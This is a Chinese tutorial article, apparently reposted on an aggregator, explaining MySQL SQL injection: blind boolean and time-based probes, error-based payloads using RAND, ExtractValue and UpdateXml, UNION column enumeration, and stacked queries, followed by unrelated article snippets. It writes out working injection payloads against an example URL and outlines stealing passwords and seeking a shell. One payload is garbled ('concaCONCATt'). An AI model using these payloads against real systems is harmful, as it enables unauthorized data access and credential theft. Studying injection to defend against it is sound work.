mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入

盲注

关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据

布尔盲注

目标地址:http://newspaper.com/items.php?id=2

对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2

然后攻击者尝试返回 false 的查询:http://newspaper.com/items.php?id=2 and 1=2

对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2 and 1=2

如果网页应用存在 SQL 注入漏洞,那么其可能不会返回数据。为了确认这一点,攻击者会再次注入一次返回 true 的查询:http://newspaper.com/items.php?id=2 and 1=1

如果前后两次查询返回的网页内容不同,攻击者就能够通过组合 Payload 遍历出想要的数据。

时间盲注猜测密码的首字符是否为 ‘2’,是的话等待10秒。

对应 MySQL 语句为 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

报错注入完整的语句如 SELECT * FROM xxx WHERE id=1 AND ({Payload}),{Payload} 详细内容见下文

关键点是 构造错误信息,让自己想要的数据被输出到错误信息中

RAND

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

RAND(0) 0为随机函数的种子,该函数产生浮点数v,且v的范围为 0 <= v < 1.0

FLOOR(X) 取不大于 X 的最大整数

FLOOR(RAND(0)*2) 返回 0 或 1

0x3a 是 “:” 的 Unicode,单纯为了拼接好看

CONCAT() 拼接字符串

GROUP BY 按拼接字符串分组

COUNT(*) 记录的总数,这里会阻止 GROUP BY 直接优化得到 0 和 1 的结果

结合以上内容,当 FLOOR(RAND(0)*2) 出现重复值时,数据库会报错,报错信息类似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’

这样我们就可以从报错信息中获取到我们想要的信息,这次是数据库版本。

rand 的结果是随机的,也可以选择以下两种函数来构造错误信息。

ExtractValue

Description: 查询 XML 文档的函数

Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))

Output: - XPATH syntax error: '~5.5.53~'

UpdateXml

Description: 修改 XML 文档的函数

Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)

Output: - XPATH syntax error: '~5.5.53~'

UNION 查询注入UNION 语句合并多个 SELECT 语句的结果并返回

关键点:UNION 连接的多个 SELECT 语句中,每一列的数据类型应该相同,且选中相同数量的列。对于 Oracle 数据库,还要求 SELECT 必须使用 FORM 指定一个有效的表名。

确定列的数量使用 ORDER BY

依次使用以下序列中的语句,直到报错,如 The ORDER BY position number 3 is out of range of the number of items in the select list,进而确认列的数量。

1

2

31 ORDER BY 1--

1 ORDER BY 2--

1 ORDER BY 3--

使用 UNION SELECE NULL,...

NULL 可以被转为任意数据类型,所以这里可以用来作为返回值。

依次使用以下序列中的语句,直到报错,如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists,进而确认列的数量。

1

2

31 UNION SELECT NULL--

1 UNION SELECT NULL,NULL--

1 UNION SELECT NULL,NULL,NULL--

找到字符串类型的列

同样的,可以依次尝试以下序列:

1

2

3

41 UNION SELECT 'a',NULL,NULL,NULL--

1 UNION SELECT NULL,'a',NULL,NULL--

1 UNION SELECT NULL,NULL,'a',NULL--

1 UNION SELECT NULL,NULL,NULL,'a'--

如果对应的列与字符串类型不兼容,就会报错,如 Conversion failed when converting the varchar value ‘a’ to data type int ,所以如果不报错,我们就找到了字符串类型的列。

覆盖原有数据

注入点一般在 WHERE 处,使用 1 AND false UNION SELECT ... 将原有输出覆盖。

堆叠注入

堆叠注入指的是被注入方允许同时执行多条语句,那么攻击者就可以利用额外的语句完成任何操作。

敏感数据

成功注入后,接下来的流程一般是:

获取当前用户/数据库

获取用户名和密码

枚举数据库/表/列

尝试获取系统 shell

结合利用其他漏洞

Reference

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/295267.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

清华教授转述:读博6年未毕业被认定为自控力不够,或将影响个人贷款额度

全世界只有3.14 % 的人关注了爆炸吧知识图片来源&#xff1a;网络来源&#xff1a;募格课堂、微博人文清华、中国教育报、学位与写作据清华大学“人文清华”讲坛官方微博人文清华发布&#xff0c;清华大学公共管理学院院长江小涓教授在一次演讲中透露&#xff0c;互联网银行工作…

缕一缕c#可null类型

在古时候&#xff0c;引用类型是的默认值就是null&#xff0c;值类型是不可以赋值null的&#xff0c;所以那时候&#xff0c;“未将对象引用到实例”这个错误&#xff0c;是引用类型的。后来&#xff0c;值类型也可以赋值null了&#xff0c;只要在值类型变量定义的时候&#xf…

[原]NYOJ-开灯问题-77

大学生程序代写 //http://acm.nyist.net/JudgeOnline/problem.php?pid77/*题目77题目信息运行结果本题排行讨论区开灯问题时间限制&#xff1a;3000 ms | 内存限制&#xff1a;65535 KB难度&#xff1a;1描述有n盏灯&#xff0c;编号为1~n&#xff0c;第1个人把所有灯打开&a…

Android之Windows下搭建React Native Android开发环境(差不多搞了一天)

Android之Windows下搭建React Native Android开发环境 穷逼买不起mac,但是他们都说React Native Android只能在mac下面运行,然后到网上各种找资料看能不能在Windows下面搭建开发环境,找了几篇,但是讲得不够详细,没有图片,很虚,然后我用自己的小米手机尝试了…

这6部顶级数学纪录片,告诉你数学一点都不无趣!

全世界只有3.14 % 的人关注了爆炸吧知识丘成桐曾说&#xff0c;“中国数学发展很快&#xff0c;但距离欧洲和美国还有相当大的差距”&#xff0c;在美国排名前20的顶尖大学里&#xff0c;包括哈佛大学、普林斯顿大学、斯坦福大学、加州大学伯克利分校等&#xff0c;具有国际一流…

JAVA兔子繁衍_Java 编程经典案例之兔子繁殖迭代问题

题目有一对兔子&#xff0c;从出生后第3个月起每个月都生一对兔子&#xff0c;小兔子长到第三个月后每个月又生一对兔子&#xff0c;假如兔子都不死&#xff0c;问第6个月的兔子总数为多少&#xff1f;分析首先我们要明白题目的意思指的是每个月的兔子总对数&#xff1b;假设将…

检查可执行文件所需要的共享库

1.3 ldd 和 ldconfigldd 是用来检查可执行文件所需要的共享库。例如&#xff1a;$ ldd /bin/lslibtermcap.so.2 > /lib/libtermcap.so.2 (0x4001c000)libc.so.6 > /lib/libc.so.6 (0x40020000)/lib/ld-linux.so.2 > /lib/ld-linux.so.2 (0x40000000)我们在 /bin/ls 程…

C# GTS四轴运动控制器实例(固高科技步进电机不带编码器) -V1

注&#xff1a;由于电机不带编码器&#xff0c;无法做home和当前位置信息读取&#xff01;功能&#xff1a;三个轴的点位运动&#xff1a;前进后退&#xff0c;并分别显示每个轴的移动脉冲数(可以换算为距离)&#xff01;开发环境&#xff1a;VS2017硬件设备&#xff1a;固高科…

node.js npm常用命令

npm是一个node包管理和分发工具&#xff0c;已经成为了非官方的发布node模块&#xff08;包&#xff09;的标准。有了npm&#xff0c;可以很快的找到特定服务要使用的包&#xff0c;进行下载、安装以及管理已经安装的包。 1、npm install moduleNames&#xff1a;安装Node模块 …

编程珠玑第三章

第三章的总的原则&#xff1a; 1.将重复性代码改到数组中&#xff0c;使用最简单的数据结构---数组来表示一段冗长的相类似的代码往往可以达到最佳效果 2.封装复杂的结构时&#xff0c;使用抽象的术语对她进行定义&#xff0c;并将那些操作表示成一个类。 3.尽可能地使用高级工…

java基础巩固笔记(6)-注解

2019独角兽企业重金招聘Python工程师标准>>> java基础巩固笔记(6)-注解 标签&#xff1a; java [TOC] 注解&#xff08;Annotation&#xff09;&#xff0c;也叫元数据。一种代码级别的说明。它是JDK1.5及以后版本引入的一个特性&#xff0c;与类、接口、枚举是在同…

男人都能有多浪漫?

1 如何对付有拖延症的朋友&#xff01;▼2 男人能有多浪漫&#xff1f;&#xff08;via.MOM南菁&#xff09;▼3 现实版&#xff1a;别说话吻我&#xff1f;&#xff08;素材来源网络&#xff0c;侵删&#xff09;▼4 注入了灵魂的神作&#xff01;&#xff08;素材来源网络…

在业务层实现记录请求日志

前言上次&#xff0c;我们介绍了如何《在业务层实现响应缓存》。今天&#xff0c;我们同样使用IPipelineBehavior&#xff0c;介绍如何在业务层实现记录请求日志&#xff0c;用于跟踪每个请求执行的耗时。Demo创建ASP.NET Core Web API项目&#xff0c;引用Nuget包&#xff1a;…

InfoQ —— 腾讯游戏大数据服务场景与应用

简介 周东祥&#xff0c;本人从2010年毕业进入腾讯互动娱乐部门工作&#xff0c;一直致力在腾讯游戏运营开发工作。先后负责SAP业务受理系统&#xff0c;盗号自助系统&#xff0c;元数据系统以及近2年在腾讯游戏大数据运营开发中积累大量的大数据开发与应用经验。 介绍 数据采集…

如何加强测评机构自身的规范化管理, 不断提高测评的能力和水平

0&#xff0e;引言 随着用户消费习惯从产品转向服务&#xff0c;服务已经成为企业向客户提供的主要商品。而等级保护测评服务作为信息系统建设的新要素&#xff0c;用户对信息安全等级保护测评服务&#xff08;以下简称服务&#xff09;的认同会影响用户的消费行为。对于信息安…

气溶胶光学厚度反演的两种方式(卫星探测和基地观测反演)

基地观测反演&#xff1a;目前在地基大气气溶胶光学特性遥感方面&#xff0c;太阳光度计测量是应用较多也是最为可靠的一种测量方法&#xff0c;太阳光度计除了可以用于地基观测太阳直接辐射通量外&#xff0c;还可以用来观测天空各方向上的辐射反演气溶胶粒子的谱分布和散射相…

Android之React Native平台与Android本地模块之间的调用

Native 模块(Android) 有时候APP需要做出React Native平台没有的功能,你也许会想用一些存在的java代码去解决问题,而不是用javascript脚本去去解决问题,或许写一些高性能,多线程的代码,列如图片处理,数据库,或者任何先进的继承 我们设计Reac…

美国人竟然花10年时间研究夫妻那些事!网上的那些传言竟然是真的......

全世界只有3.14 % 的人关注了爆炸吧知识恋爱变胖是真的爱你也是有一天超模君看到个新闻&#xff0c;某女网友在微博里发了一张秀恩爱照片&#xff0c;这次没有像往日一样收到柠檬精的艳羡&#xff0c;相反评论区一片静默。。。某女网友晒出老公四年的巨大变化图by微博一个阿呆仔…

Java常用的知识点就20_JAVA中一些需要记录的知识点

原标题&#xff1a;JAVA中一些需要记录的知识点的老师今天给大家讲java中一些重要的知识点。JDK与JRE的区别&#xff1a;JRE是所有JAVA程序运行所需要的环境&#xff0c;任何JAVA程序的运行都依赖于JRE&#xff0c;当前从JAVA官网选择安装JAVA即安装的是JRE。JDK是为开发人员所…

github开源推荐:SuperSocket, 可扩展的 Socket 服务器框架

1、简介SuperSocket 是一个轻量级, 跨平台而且可扩展的 .Net/Mono Socket 服务器程序框架。你无须了解如何使用 Socket, 如何维护 Socket 连接和 Socket 如何工作&#xff0c;但是你却可以使用 SuperSocket 很容易的开发出一款 Socket 服务器端软件&#xff0c;例如游戏服务器&…